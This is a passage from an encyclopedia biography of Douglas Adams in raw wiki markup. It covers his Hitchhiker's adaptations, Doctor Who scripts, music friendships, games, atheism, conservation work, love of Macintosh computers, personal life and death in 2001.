incorporated into paperback covers of the first four ''Hitchhiker's'' novels (the paperback for the fifth re-used the artwork from the hardback edition).<ext><name>ref</name><attr/><inner>[http://www.iblist.com/series.php?id=2 Internet Book List] page, with links to all five novels, and reproductions of the 1990s paperback covers that included the [[42 Puzzle]].</inner><close></ref></close></ext>\n\nIn 1980 Adams also began attempts to turn the first ''Hitchhiker's'' novel into a movie, making several trips to Los Angeles, and working with a number of Hollywood studios and potential producers. The next year, the radio series became the basis for a BBC television mini-series<ext><name>ref</name><attr/><inner>{{citation|url=http://www.imdb.com/title/tt0081874/|title=''The Hitch Hiker's Guide to the Galaxy''|publisher=Internet Movie Database}}</inner><close></ref></close></ext> broadcast in six parts. When he died in 2001 in California, he had been trying again to get the movie project started with [[Disney]], which had bought the rights in 1998. The screenplay finally got a posthumous re-write by [[Karey Kirkpatrick]], and [[The Hitchhiker's Guide to the Galaxy (film)|the resulting film]] was released in 2005.\n\nRadio producer [[Dirk Maggs]] had consulted with Adams, first in 1993, and later in 1997 and 2000 about creating a third radio series, based on the third novel in the ''Hitchhiker's'' series.<ext><name>ref</name><attr/><inner>{{cite book | author=Adams, Douglas. | editor = [[Dirk Maggs]], dramatisations and editor | title=The Hitchhiker's Guide to the Galaxy Radio Scripts: The Tertiary, Quandary and Quintessential Phases | publisher=Pan Books | year=2005|isbn=0-330-43510-8 |pages=xiv | nopp=true}}</inner><close></ref></close></ext> They also discussed the possibilities of radio adaptations of the final two novels in the five-book "trilogy". As with the movie, this project was only realised after Adams's death. The third series, ''[[The Hitchhiker's Guide to the Galaxy Tertiary to Quintessential Phases#The Tertiary Phase|The Tertiary Phase]]'', was broadcast on [[BBC Radio 4]] in September 2004 and was subsequently released on audio CD. With the aid of a recording of his reading of ''Life, the Universe and Everything'' and editing, Adams can be heard playing the part of Agrajag posthumously. ''So Long, and Thanks for All the Fish'' and ''Mostly Harmless'' made up the fourth and fifth radio series, respectively (on radio they were titled ''[[The Hitchhiker's Guide to the Galaxy Tertiary to Quintessential Phases#The Quandary Phase|The Quandary Phase]]'' and ''[[The Hitchhiker's Guide to the Galaxy Tertiary to Quintessential Phases#The Quintessential Phase|The Quintessential Phase]]'') and these were broadcast in May and June 2005, and also subsequently released on Audio CD. The last episode in the last series (with a new, "more upbeat" ending) concluded with, "The very final episode of ''The Hitchhiker's Guide to the Galaxy'' by Douglas Adams is affectionately dedicated to its author."<ext><name>ref</name><attr/><inner>Adams, ''Dirk Maggs'', Page 356.</inner><close></ref></close></ext>\n\n<h level=\"4\" i=\"6\">====''Dirk Gently'' series====</h>\n[[File:Douglas Adams San Francisco.jpg|thumb|Adams in March 2000]]\nIn between Adams's first trip to Madagascar with [[Mark Carwardine]] in 1985, and their series of travels that formed the basis for the radio series and non-fiction book ''[[Last Chance to See]]'', Adams wrote two other novels with a new cast of characters. ''[[Dirk Gently's Holistic Detective Agency]]'' was first published in 1987, and was described by its author as "a kind of ghost-horror-detective-time-travel-romantic-comedy-epic, mainly concerned with mud, music and quantum mechanics".<ext><name>ref</name><attr/><inner>{{cite book|author=[[Neil Gaiman|Gaiman, Neil]] | title=Don't Panic: Douglas Adams & The Hitchhiker's Guide to the Galaxy | edition=Second U.S. | publisher=Titan Books | year=2003 | page=169 | isbn=1-84023-742-2}}</inner><close></ref></close></ext> It was derived from two Doctor Who serials Adams had written.\n\nA sequel novel, ''[[The Long Dark Tea-Time of the Soul]]'', was published a year later. This was an entirely original work, Adams's first since ''So Long, and Thanks for All the Fish.'' After the book tour, Adams set off on his round-the-world excursion which supplied him with the material for ''Last Chance to See''.\n\n<h level=\"4\" i=\"7\">====''Doctor Who''====</h>\n<template lineStart=\"1\"><title>Main article</title><part><name index=\"1\"/><value>Doctor Who</value></part></template>\nAdams sent the script for the ''HHGG'' pilot radio programme to the ''Doctor Who'' production office in 1978, and was commissioned to write ''[[The Pirate Planet]]'' (see below). He had also previously attempted to submit a potential movie script, called "Doctor Who and the Krikkitmen", which later became his novel ''Life, the Universe and Everything'' (which in turn became the third ''Hitchhiker's Guide'' radio series). Adams then went on to serve as script editor on the show for its seventeenth season in 1979. Altogether, he wrote three [[List of Doctor Who serials|''Doctor Who'' serials]] starring [[Tom Baker]] as [[The Doctor (Doctor Who)|the Doctor]]:\n* "[[The Pirate Planet]]" (the second serial in the "[[The Key to Time|Key to Time]]" arc, in [[Doctor Who (season 16)|season 16]])\n* "[[City of Death]]" (with producer [[Graham Williams (television producer)|Graham Williams]], from an original storyline by writer [[David Fisher (writer)|David Fisher]]. It was transmitted under the pseudonym "[[David Agnew]]")\n* "[[Shada]]" (only partially filmed; not televised due to [[strike action|industry disputes]])\n\nThe episodes authored by Adams are some of the few that were not novelised as Adams would not allow anyone else to write them, and asked for a higher price than the publishers were willing to pay.<ext><name>ref</name><attr/><inner>{{cite web|url=http://www.skepticfiles.org/en001/drwhogde.htm |title=A 1990s Doctor Who FAQ |publisher=Skepticfiles.org |accessdate=11 March 2013}}</inner><close></ref></close></ext> "Shada" was later adapted as a novel by [[Gareth Roberts (writer)|Gareth Roberts]] in 2012 and "City of Death" by [[James Goss (producer)|James Goss]] in 2015.\n\nAdams was also known to allow in-jokes from ''The Hitchhiker's Guide'' to appear in the ''Doctor Who'' stories he wrote and other stories on which he served as Script Editor. Subsequent writers have also inserted ''Hitchhiker's'' references, even [[The Rings of Akhaten|as recently as 2013]]. Conversely, at least one reference to ''Doctor Who'' was worked into a ''Hitchhiker's'' novel. In ''[[Life, the Universe and Everything]]'', two characters travel in time and land on the pitch at [[Lord's Cricket Ground]]. The reaction of the radio commentators to their sudden appearance is very similar to the reactions of commentators in a scene in the eighth episode of the 1965–66-story ''[[The Daleks' Master Plan]]'', which has the Doctor's [[TARDIS]] [[Materialization (science fiction)|materialise]] on the pitch at Lord's.\n\nElements of ''Shada'' and ''City of Death'' were reused in Adams's later novel ''[[Dirk Gently's Holistic Detective Agency]]'', in particular the character of [[Professor Chronotis]]. [[Big Finish Productions]] eventually remade ''Shada'' as an audio play starring [[Paul McGann]] as the Doctor. Accompanied by partially animated illustrations, it was [[Doctor Who spin-offs#Webcasts|webcast]] on the [[BBC Online|BBC website]] in 2003, and subsequently released as a two-CD set later that year. An omnibus edition of this version was broadcast on the digital radio station [[BBC7]] on 10 December 2005.\n\nIn the ''Doctor Who'' 2012 Christmas episode ''[[The Snowmen#Production|The Snowmen]]'', writer [[Steven Moffat]] was inspired by a storyline that Adams pitched called ''The Doctor Retires''.<ext><name>ref</name><attr/><inner>{{cite web|last=Moffat |first=Steven |url=http://www.radiotimes.com/news/2012-12-24/doctor-who-christmas-special-steven-moffat-matt-smith-and-jenna-louise-coleman-reveal-all |title=Doctor Who Christmas special: Steven Moffat, Matt Smith and Jenna-Louise Coleman reveal all |work=Radio Times |date=24 December 2012 |accessdate=8 July 2013}}</inner><close></ref></close></ext>\n\nWhile he was at school,<template><title>which</title><part><name>date</name><equals>=</equals><value>October 2015</value></part></template> he wrote and performed a play called ''Doctor Which''.<ext><name>ref</name><attr> name=Adams_xx</attr><inner>{{Harvnb|Adams|2002|pp=xx}}</inner><close></ref></close></ext>\n\n<h level=\"3\" i=\"8\">===Music===</h>\nAdams played the guitar left-handed and had a collection of twenty-four left-handed guitars when he died (having received his first guitar in 1964). He also studied piano in the 1960s with the same teacher as [[Paul Wickens]], the pianist who plays in [[Paul McCartney]]'s band (and composed the music for the 2004–2005 editions of the ''Hitchhiker's Guide'' radio series).<ext><name>ref</name><attr/><inner>Webb, page 49.</inner><close></ref></close></ext> [[Pink Floyd]] and [[Procol Harum]] had important influence on Adams's work.\n\n<h level=\"4\" i=\"9\">====Pink Floyd====</h>\n\nAdams included a reference to [[Pink Floyd]] in the original radio version of ''[[The Hitchhiker's Guide to the Galaxy]]'', in which he describes the main characters surveying the landscape of an alien planet while Marvin, their android companion, hums Pink Floyd's "[[Shine on You Crazy Diamond]]" (Part 1). This was cut out of the CD version. Adams also compared the various noises that the [[kakapo]] makes to "Pink Floyd studio out-takes" in his non-fiction book on endangered species, ''[[Last Chance to See]]''.\n\nAdams's official biography shares its name with the song "[[Wish You Were Here (1975 song)|Wish You Were Here]]" by Pink Floyd. Adams was friends with Pink Floyd guitarist [[David Gilmour]] and, on Adams's 42nd birthday, he was invited to make a guest appearance at Pink Floyd's concert of 28 October 1994 at Earls Court in London, playing guitar on the songs "[[Brain Damage (song)|Brain Damage]]" and "[[Eclipse (song)|Eclipse]]".<ext><name>ref</name><attr> name=Mabbett-MM</attr><inner>{{Cite book |publisher= Omnibus Press |isbn= 978-1-84938-370-7 |last= Mabbett |first= Andy |title= Pink Floyd – The Music and the Mystery |location= London |year= 2010 }}</inner><close></ref></close></ext> Adams chose the name for Pink Floyd's 1994 album, ''[[The Division Bell]]'', by picking the words from the lyrics to one of its tracks, "High Hopes".<ext><name>ref</name><attr> name=Mabbett-MM </attr></ext> Gilmour also performed at Adams's memorial service in 2001, and what would have been Adams's 60th birthday party in 2012.\n\n<h level=\"4\" i=\"10\">====Procol Harum====</h>\nAdams was a friend of [[Gary Brooker]], the lead singer, pianist and songwriter of [[Procol Harum]]. Adams invited Brooker to one of the many parties that Adams held at his house. On one such occasion Gary Brooker performed the full (4 verse) version of "[[A Whiter Shade of Pale]]". Brooker also performed at Adams's memorial service.\n\nAdams appeared on stage with Brooker to perform "In Held 'Twas in I" at Redhill when the band's lyricist [[Keith Reid]] was not available. On several other occasions he introduced Procol Harum at their gigs.\n\nAdams would listen to music while writing, and this would occasionally influence his work. On one occasion the title track from the Procol Harum album ''[[Grand Hotel (album)|Grand Hotel]]'' was playing when\n<template lineStart=\"1\"><title>quotation</title><part><name index=\"1\"/><value>Suddenly in the middle of the song there was this huge orchestral climax that came out of nowhere and did not seem to be about anything. I kept wondering what was this huge thing happening in the background? And I eventually thought&nbsp;... it sounds as if there ought to be some sort of floorshow going on. Something huge and extraordinary, like, well, like the end of the universe. And so that was where the idea for The Restaurant at the End of the Universe came from.</value></part><part><name index=\"2\"/><value>Douglas Adams</value></part><part><name index=\"3\"/><value>Procol Harum at The Barbican<ext><name>ref</name><attr/><inner>{{cite web|url=http://www.procolharum.com/dadams.htm |title=Text of one of Douglas Adams's introductions of Procol Harum in concert |accessdate=21 August 2006|last=Adams |first=Douglas |date=8 February 1996}}</inner><close></ref></close></ext></value></part></template>\n\n<h level=\"3\" i=\"11\">===Computer games and projects===</h>\nDouglas Adams created an [[interactive fiction]] version of ''[[The Hitchhiker's Guide to the Galaxy (computer game)|HHGG]]'' with [[Steve Meretzky]] from [[Infocom]] in 1984. In 1986 he participated in a week-long brainstorming session with the [[Lucasfilm Games]] team for the game ''[[Labyrinth: The Computer Game|Labyrinth]]''. Later he was also involved in creating ''[[Bureaucracy (computer game)|Bureaucracy]]'' (also by Infocom, but not based on any book; Adams wrote it as a parody of events in his own life).\n\nAdams was a founder-director and Chief Fantasist of [[The Digital Village]], a digital media and Internet company with which he created ''[[Starship Titanic]]'', a [[Codie]] Award-winning and [[BAFTA#Games Awards|BAFTA-nominated adventure game]], which was published in 1998 by [[Simon & Schuster]].<ext><name>ref</name><attr> name="bbc.co.uk"</attr><inner>BBC Online (no date) [http://www.bbc.co.uk/cult/hitchhikers/dna/biog.shtml "The Hitchhiker's Guide to the Galaxy: DNA (1952-2001)"] Accessed 9 July 2014</inner><close></ref></close></ext><ext><name>ref</name><attr/><inner>Botti, Nicolas (2009). [http://www.douglasadams.eu/en_adams_bio.php "Life, DNA & h2g2: Douglas Adams's Biography"] Accessed 9 July 2014</inner><close></ref></close></ext> [[Terry Jones]] wrote the accompanying book, entitled ''Douglas Adams Starship Titanic'', since Adams was too busy with the computer game to do both. In April 1999, Adams initiated the [[h2g2]] [[collaborative writing]] project, an experimental attempt at making ''The Hitchhiker's Guide to the Galaxy'' a reality, and at harnessing the collective brainpower of the internet community. It found a new home at BBC Online in 2001.<ext><name>ref</name><attr> name="bbc.co.uk"</attr></ext>\n\nIn 1990 Adams wrote and presented a television documentary programme ''[[Hyperland]]''<ext><name>ref</name><attr/><inner>[http://www.imdb.com/title/tt0188677/ Internet Movie Database's page for ''Hyperland'']</inner><close></ref></close></ext> which featured [[Tom Baker]] as a "software agent" (similar to the assistant pictured in Apple's [[Knowledge Navigator]] video of future concepts from 1987), and interviews with [[Ted Nelson]], the co-inventor of [[hypertext]] and the person who coined the term. Although Adams did not invent hypertext, he was an [[early adopter]] and advocate of it. This was the same year that [[Tim Berners-Lee]] used the idea of hypertext in his [[HTML]].\n\n<h level=\"2\" i=\"12\">==Personal beliefs and activism==</h>\n\n<h level=\"3\" i=\"13\">===Atheism and views on religion===</h>\nAdams described himself as a "radical [[atheist]]", adding ''radical'' for emphasis so he would not be asked if he meant agnostic. He told [[American Atheists]] that this made things easier, but most importantly it conveyed the fact that he really meant it. "I am convinced that there is not a god," he said. He imagined a [[Fine-tuned Universe#In popular culture|sentient puddle]] who wakes up one morning and thinks, "This is an interesting world I find myself in – an interesting hole I find myself in – fits me rather neatly, doesn't it? In fact it fits me staggeringly well, must have been made to have me in it!" to demonstrate his view that the [[fine-tuned Universe]] argument for God was a fallacy.<ext><name>ref</name><attr/><inner>Adams 1998.</inner><close></ref></close></ext>\n\nDespite this, he remained fascinated by religion because of its effect on human affairs. "I love to keep poking and prodding at it. I've thought about it so much over the years that that fascination is bound to spill over into my writing."<ext><name>ref</name><attr> name=amath</attr><inner>{{cite journal|last=Silverman |first=Dave |title=Interview: Douglas Adams |journal=American Atheist |year=1998–1999 |volume=37 |issue=1 |url=http://www.atheists.org/Interview%3A__Douglas_Adams |accessdate=16 August 2009 |archiveurl=http://www.webcitation.org/63mRFcWVO?url=http%3A%2F%2Fwww.atheists.org%2FInterview%253A__Douglas_Adams |archivedate=8 December 2011 |deadurl=no |df=dmy }}</inner><close></ref></close></ext>\n\nThe evolutionary biologist and atheist [[Richard Dawkins]] uses Adams's influence throughout to exemplify arguments for non-belief in his 2006 book ''[[The God Delusion]]''. Dawkins dedicated the book to Adams, whom he jokingly called "possibly [my] only convert" to atheism<ext><name>ref</name><attr> name="TheGuardian"</attr><inner>{{cite news|url=http://books.guardian.co.uk/reviews/roundupstory/0,,1939704,00.html |title=Observer, '&#39;The God Delusion'&#39;, 5&nbsp;November 2006|newspaper=[[The Guardian]]|date=5 November 2006 |accessdate=1 June 2009 | location=London | first=Kim | last=Bunce}}</inner><close></ref></close></ext> and wrote on his death that "Science has lost a friend, literature has lost a luminary, the [[mountain gorilla]] and the [[black rhino]] have lost a gallant defender."<ext><name>ref</name><attr> name=Dawkins2001</attr><inner>{{cite news|last=Dawkins|first=Richard|title=Lament for Douglas Adams|url=http://www.guardian.co.uk/uk/2001/may/14/books.booksnews|accessdate=29 December 2012|newspaper=The Guardian|date=13 May 2001}}</inner><close></ref></close></ext>\n\n<h level=\"3\" i=\"14\">===Environmental activism===</h>\nAdams was also an [[environmental activist]] who campaigned on behalf of [[endangered species]]. This activism included the production of the non-fiction radio series ''[[Last Chance to See]]'', in which he and [[natural history|naturalist]] [[Mark Carwardine]] visited rare species such as the [[kakapo]] and [[Chinese river dolphin|baiji]], and the publication of a tie-in book of the same name. In 1992 this was made into a CD-ROM combination of [[audiobook]], [[e-book]] and picture slide show.\n\nAdams and Mark Carwardine contributed the 'Meeting a Gorilla' passage from ''[[Last Chance to See]]'' to the book ''[[Great Ape Project|The Great Ape Project]]''.<ext><name>ref</name><attr/><inner>{{cite book | author=[[Paola Cavalieri|Cavalieri, Paola]] and [[Peter Singer]], editors | title=The Great Ape Project: Equality Beyond Humanity | edition=U.S. Paperback | publisher=St. Martin's Griffin | year=1994 | pages=19–23|isbn=0-312-11818-X}}</inner><close></ref></close></ext> This book, edited by [[Paola Cavalieri]] and [[Peter Singer]], launched a wider-scale project in 1993, which calls for the extension of moral equality to include all great apes, human and non-human.\n\nIn 1994 he participated in a climb of [[Mount Kilimanjaro]] while wearing a rhino suit for the British charity organisation ''[[Save the Rhino|Save the Rhino International]]''. Puppeteer [[William Todd-Jones]], who had originally worn the suit in the London Marathon to raise money and bring awareness to the group, also participated in the climb wearing a rhino suit; Adams wore the suit while travelling to the mountain before the climb began. About £100,000 was raised through that event, benefiting schools in [[Kenya]] and a [[black rhinoceros]] preservation programme in [[Tanzania]]. Adams was also an active supporter of the ''[[Dian Fossey]] Gorilla Fund''.\n\nSince 2003, ''Save the Rhino'' has held an annual Douglas Adams Memorial Lecture around the time of his birthday to raise money for environmental campaigns.<ext><name>ref</name><attr/><inner>{{cite web|url=http://lifednah2g2.blogspot.co.uk/2011/01/ninth-douglas-adams-memorial-lecture.html |title=The Ninth Douglas Adams Memorial Lecture |publisher=Save the Rhino International |accessdate=27 July 2011}}</inner><close></ref></close></ext> The lectures in the series are:\n* 2003 [[Richard Dawkins]] – ''Queerer than we can suppose: the strangeness of science''\n* 2004 [[Robert Swan]] – ''Mission Antarctica''\n* 2005 [[Mark Carwardine]] – ''Last Chance to See... Just a bit more''\n* 2006 [[Robert Winston]] – ''Is the Human an Endangered Species?''\n* 2007 [[Richard Leakey]] – ''Wildlife Management in East Africa – Is there a future?''\n* 2008 [[Steven Pinker]] – ''The Stuff of Thought, Language as a Window into Human Nature''\n* 2009 [[Benedict Allen]] – ''Unbreakable''\n* 2010 [[Marcus du Sautoy]] – ''42: the answer to life, the universe and prime numbers''\n* 2011 [[Brian Cox (physicist)|Brian Cox]] – ''The Universe and Why We Should Explore It''\n* 2012 Lecture replaced by "Douglas Adams The Party"<ext><name>ref</name><attr/><inner>{{cite web|url=http://www.savetherhino.org/latest_news/news/287_douglas_adams_the_party |title=Douglas Adams The Party |publisher=Save the Rhino International |accessdate=11 March 2013}}</inner><close></ref></close></ext>\n* 2013 [[Adam Rutherford]] – ''Creation: the origin and the future of life''<ext><name>ref</name><attr/><inner>{{cite web|url=http://www.savetherhino.org/events/476_douglas_adams_memorial_lecture_2013 |title=Douglas Adams Memorial Lecture 2013 |publisher=Save the Rhino International |accessdate=15 August 2012}}</inner><close></ref></close></ext>\n* 2014 [[Roger Highfield]] and [[Simon Singh]] – ''The Science of Harry Potter and the Mathematics of The Simpsons''<ext><name>ref</name><attr/><inner>{{cite web|url=http://www.savetherhino.org/events/798_douglas_adams_memorial_lecture |title=Douglas Adams Memorial Lecture 2014 |publisher=Save the Rhino International |accessdate=15 November 2013}}</inner><close></ref></close></ext>\n* 2015 [[Neil Gaiman]] – ''Immortality and Douglas Adams''<ext><name>ref</name><attr/><inner>{{cite web|url=http://www.savetherhino.org/events/1059_douglas_adams_memorial_lecture_2015_-_sold_out |title=Douglas Adams Memorial Lecture 2015 |publisher=Save the Rhino International |accessdate=30 January 2015}}</inner><close></ref></close></ext>\n* 2016 [[Alice Roberts]] – ''Survivors of the Ice Age''<ext><name>ref</name><attr/><inner>{{ cite web|url=https://www.savetherhino.org/events/1383_douglas_adams_memorial_lecture_2016|title=Douglas Adams Memorial Lecture 2016 |publisher=Save the Rhino International |accessdate=7 December 2015}}</inner><close></ref></close></ext>\n\n<h level=\"3\" i=\"15\">===Technology and innovation===</h>\nAdams bought his first [[word processor]] in 1982, having considered one as early as 1979. His first purchase was a 'Nexus'. In 1983, when he and Jane Belson went out to Los Angeles, he bought a [[Digital Equipment Corporation|DEC]] [[Rainbow 100|Rainbow]]. Upon their return to England, Adams bought an [[Apricot Computers|Apricot]], then a [[BBC Micro]] and a [[Tandy 1000]].<ext><name>ref</name><attr> name=Simpson_184-185</attr><inner>{{Harvnb|Simpson|2003|pp=184–185}}</inner><close></ref></close></ext> In ''[[Last Chance to See]]'' Adams mentions his [[Cambridge Z88]], which he had taken to [[Zaire]] on a quest to find the [[northern white rhinoceros]].<ext><name>ref</name><attr/><inner>{{cite book|author=Adams, Douglas and [[Mark Carwardine]] | title=Last Chance to See | edition=First U.S. Hardcover | publisher=[[Harmony Books]] | year=1991 | page=59 | isbn=0-517-58215-5}}</inner><close></ref></close></ext>\n\nAdams's posthumously published work, ''[[The Salmon of Doubt]]'', features multiple articles by him on the subject of technology, including reprints of articles that originally ran in ''[[MacUser]]'' magazine, and in ''[[The Independent on Sunday]]'' newspaper. In these Adams claims that one of the first computers he ever saw was a [[Commodore PET]], and that he has "adored" his Apple Macintosh ("or rather my family of however many Macintoshes it is that I've recklessly accumulated over the years") since he first saw one at Infocom's offices in Boston in 1984.<ext><name>ref</name><attr/><inner>{{cite book | author=Adams, Douglas | title=The Salmon of Doubt: Hitchhiking the Galaxy One Last Time | edition=First UK hardcover | publisher=Macmillan | year=2002 | pages=90–1 | isbn=0-333-76657-1}}</inner><close></ref></close></ext>\n\nAdams was a Macintosh user from the time they first came out in 1984 until his death in 2001. He was the first person to buy a Mac in Europe (the second being [[Stephen Fry]] – though some accounts differ on this, saying Fry bought his Mac first. Fry claims he was second to Adams<ext><name>ref</name><attr/><inner>{{cite web|url=https://www.youtube.com/watch?v=gx6WPQkhUXI |title=Craig Ferguson 23 February, 2010B Late Late show Stephen Fry PT2 |publisher=YouTube |date=21 June 2010 |accessdate=27 July 2011}}</inner><close></ref></close></ext>). Adams was also an "[[AppleMasters|Apple Master]]", one of several celebrities whom Apple made into spokespeople for its products (other Apple Masters included [[John Cleese]] and [[Gregory Hines]]). Adams's contributions included a rock video that he created using the first version of [[iMovie]] with footage featuring his daughter Polly. The video was available on Adams's [[.Mac]] homepage. Adams installed and started using the first release of [[Mac OS X]] in the weeks leading up to his death. His very last post to his own forum was in praise of Mac OS X and the possibilities of its [[Cocoa (API)|Cocoa]] programming framework. He said it was "awesome...", which was also the last word he wrote on his site.<ext><name>ref</name><attr/><inner>{{cite web|url=http://www.douglasadams.com/cgi-bin/mboard/info/dnathread.cgi?2922,1 |title=Adams's final post on his forums at |publisher=Douglasadams.com |accessdate=1 June 2009}}</inner><close></ref></close></ext>\n\nAdams used e-mail extensively long before it reached popular awareness, using it to correspond with [[Steve Meretzky]] during the pair's collaboration on Infocom's version of ''[[The Hitchhiker's Guide to the Galaxy (computer game)|The Hitchhiker's Guide to the Galaxy]]''.<ext><name>ref</name><attr> name="Simpson_184-185"</attr></ext> While living in New Mexico in 1993 he set up another e-mail address and began posting to his own [[USENET]] newsgroup, alt.fan.douglas-adams, and occasionally, when his computer was acting up, to the comp.sys.mac hierarchy.<ext><name>ref</name><attr/><inner>{{cite web|url=https://groups.google.com/group/alt.fan.douglas-adams |title=Discussions – alt.fan.douglas-adams &#124; Google Groups |publisher=Google |accessdate=11 March 2013}}</inner><close></ref></close></ext> Many of his posts are now archived through Google. Challenges to the authenticity of his messages later led Adams to set up a message forum on his own website to avoid the issue. In 1996, Adams was a keynote speaker at The [[Microsoft]] [[Professional Developers Conference]] (PDC) where he described the personal computer as being a modelling device. The video of his keynote speech is archived on [[Channel 9 (discussion forum)|Channel 9]].<ext><name>ref</name><attr/><inner>{{cite web |last = Adams |first = Douglas |title = PDC 1996 Keynote with Douglas Adams |work=[[channel9.msdn.com]] |publisher=Channel 9 |date = 15 May 2001 |url = http://channel9.msdn.com/Events/PDC/PDC-1996/PDC-1996-Keynote-with-Douglas-Adams |accessdate =22 March 2013}}</inner><close></ref></close></ext>\nAdams was also a keynote speaker for the April 2001 [[Embedded Systems Conference#ESC Silicon Valley|Embedded Systems Conference]] in San Francisco, one of the major technical conferences on [[embedded system]] engineering. In his keynote speech, he shared his vision of technology and how it should contribute in everyday – and every man's – life.<ext><name>ref</name><attr/><inner>{{cite web |last = Cassel |first = David |title = So long, Douglas Adams, and thanks for all the fun |work=[[Salon (website)|Salon]] |publisher=Salon Media Group |date = 15 May 2001 |url = http://archive.salon.com/tech/feature/2001/05/15/douglas_adams/index.html |accessdate =10 July 2009}}</inner><close></ref></close></ext>\n\n<h level=\"2\" i=\"16\">==Personal life==</h>\nAdams moved to [[Upper Street]], [[Islington]], in 1981<ext><name>ref</name><attr> name="IPP" </attr></ext> and to Duncan Terrace, a few minutes' walk away, in the late 1980s.<ext><name>ref</name><attr> name="IPP" </attr></ext>\n\nIn the early 1980s Adams had an affair with novelist [[Sally Emerson]], who was separated from her husband at that time. Adams later dedicated his book ''[[Life, the Universe and Everything]]'' to Emerson. In 1981 Emerson returned to her husband, [[Peter Stothard]], a contemporary of Adams's at [[Brentwood School (England)|Brentwood School]], and later editor of ''[[The Times]]''. Adams was soon introduced by friends to Jane Belson, with whom he later became romantically involved. Belson was the "lady barrister" mentioned in the jacket-flap biography printed in his books during the mid-1980s ("He [Adams] lives in Islington with a lady barrister and an Apple Macintosh"). The two lived in Los Angeles together during 1983 while Adams worked on an early screenplay adaptation of ''Hitchhiker's''. When the deal fell through, they moved back to London, and after several separations ("He is currently not certain where he lives, or with whom")<ext><name>ref</name><attr> name=sfweekly</attr><inner>{{cite web|last=Bowers |first=Keith |title=Big Three |url=http://www.sfweekly.com/2011-07-06/calendar/big-three/ |work=SF Weekly |accessdate=8 December 2011 |archiveurl=http://www.webcitation.org/63mSWp8yr?url=http%3A%2F%2Fwww.sfweekly.com%2F2011-07-06%2Fcalendar%2Fbig-three%2F |archivedate=8 December 2011 |deadurl=no |date=6 July 2011 |df=dmy }}</inner><close></ref></close></ext> and an aborted engagement, they married on 25 November 1991. Adams and Belson had one daughter together, Polly Jane Rocket Adams, born on 22 June 1994, shortly after Adams turned 42. In 1999 the family moved from London to [[Santa Barbara, California]], where they lived until his death. Following the funeral, Jane Belson and Polly Adams returned to London.<ext><name>ref</name><attr/><inner>Webb, Chapter 10.</inner><close></ref></close></ext> Jane died on 7 September 2011 of cancer, aged 59.<ext><name>ref</name><attr> name=timesobit</attr><inner>{{cite web|title=Obituary & Guest Book Preview for Jane Elizabeth BELSON|url=http://announcements.thetimes.co.uk/obituaries/timesonline-uk/obituary.aspx?page=lifestory&pid=153521790|work=The Times|accessdate=8 December 2011|archiveurl=http://www.webcitation.org/63mSoMnJe|archivedate=8 December 2011|deadurl=no|date=9 September 2011}}</inner><close></ref></close></ext><ext><name>ref</name><attr> name=h2g2obit</attr><inner>{{cite web|title=Jane Belson, Douglas Adams's widow, passed away|url=http://lifednah2g2.blogspot.com/2011/09/jane-belson-douglas-adams-widow-passed.html|work=h2g2|accessdate=9 July 2013}}</inner><close></ref></close></ext>\n\n<h level=\"2\" i=\"17\">==Death and legacy==</h>\n[[File:Highgate Cemetery - East - Douglas Adams 01.jpg|thumb|Adams's gravestone, [[Highgate Cemetery]], North London]]\nAdams died of a [[heart attack]] on 11 May 2001, aged 49, after resting from his regular workout at a private gym in [[Montecito, California]]. He had unknowingly suffered a gradual narrowing of the [[coronary arteries]], which led at that moment to a [[myocardial infarction]] and a fatal [[cardiac arrhythmia]].<template><title>cn</title><part><name>date</name><equals>=</equals><value>October 2016</value></part></template> Adams had been due to deliver the commencement address at [[Harvey Mudd College]] on 13 May.<ext><name>ref</name><attr/><inner>{{cite web|url=http://www.laweekly.com/2001-05-24/news/lots-of-screamingly-funny-sentences-no-fish/ |title=Lots of Screamingly Funny Sentences. No Fish. – page 1 |last1=Lewis |first1=Judith |last2=Shulman |first2=Dave |publisher=LA Weekly |date=24 May 2001 |accessdate=20 August 2009 |archiveurl=http://www.webcitation.org/63mQ1aCJQ?url=http%3A%2F%2Fwww.laweekly.com%2F2001-05-24%2Fnews%2Flots-of-screamingly-funny-sentences-no-fish%2F |archivedate=24 May 2001 |deadurl=no |df=dmy }}</inner><close></ref></close></ext> His funeral was held on 16 May in Santa Barbara, California. His remains were subsequently cremated and the ashes placed in [[Highgate Cemetery]] in north London in June 2002.<ext><name>ref</name><attr> name=Simpson_337-338</attr><inner>{{Harvnb|Simpson|2003|pp=337–338}}</inner><close></ref></close></ext>\n\nA memorial service was held on 17 September 2001 at [[St Martin-in-the-Fields]] church, [[Trafalgar Square]], London. This became the first church service broadcast live on the web by the BBC.<ext><name>ref</name><attr/><inner>Gaiman, 204.</inner><close></ref></close></ext> Video clips of the service are still available on the BBC's website for download.<ext><name>ref</name><attr/><inner>{{cite web|url=http://www.bbc.co.uk/cult/hitchhikers/celebration/ |title=BBC Online – Cult – Hitchhiker's – Douglas Adams – Service of Celebration |publisher=BBC |date=17 September 2001 |accessdate=11 March 2013}}</inner><close></ref></close></ext>\n\nOne of his last public appearances was a talk given at the University of California, Santa Barbara, ''Parrots, the universe and everything'', recorded days before his death.<ext><name>ref</name><attr/><inner>{{cite web|url=https://www.youtube.com/watch?v=_ZG8HBuDjgc |title=Parrots, the universe and everything, recorded May 2001 |publisher=YouTube |accessdate=11 March 2013}}</inner><close></ref></close></ext> A full transcript of the talk is available, and the university has made the full video available on [https://www.youtube.com/watch?v=_ZG8HBuDjgc YouTube].<ext><name>ref</name><attr/><inner>{{cite web|url=http://navarroj.com/parrots |title=Transcript of "Parrots, the Universe and Everything" |publisher=Navarroj.com |accessdate=27 July 2011}}</inner><close></ref></close></ext>\n\nThe [[Minor Planet Centre]] space agency named an asteroid [[18610 Arthurdent]], coincidentally announcing its plan two days before Adams died.<ext><name>ref</name><attr> name=MPC42677</attr><inner>{{Citation | publication-date = 9 May 2001 | title = New Names of Minor Planets | periodical = [[Minor Planet Circular]] | publication-place = Cambridge, Mass | publisher=[[Minor Planet Center]] | issue = MPC 42677 | url = http://www.minorplanetcenter.net/iau/ECS/MPCArchive/2001/MPC_20010509.pdf | issn = 0736-6884 }}</inner><close></ref></close></ext> There is also an [[25924 Douglasadams|asteroid named after Adams himself]].<ext><name>ref</name><attr/><inner>[http://www.msnbc.msn.com/id/6867061/ Asteroid named after 'Hitchhiker' humorist: Late British sci-fi author honored after cosmic campaign] by Alan Boyle, MSNBC, 25 January 2005</inner><close></ref></close></ext>\n\nIn May 2002 ''[[The Salmon of Doubt]]'' was published, containing many short stories, essays, and letters, as well as eulogies from [[Richard Dawkins]], [[Stephen Fry]] (in the UK edition), [[Christopher Cerf]] 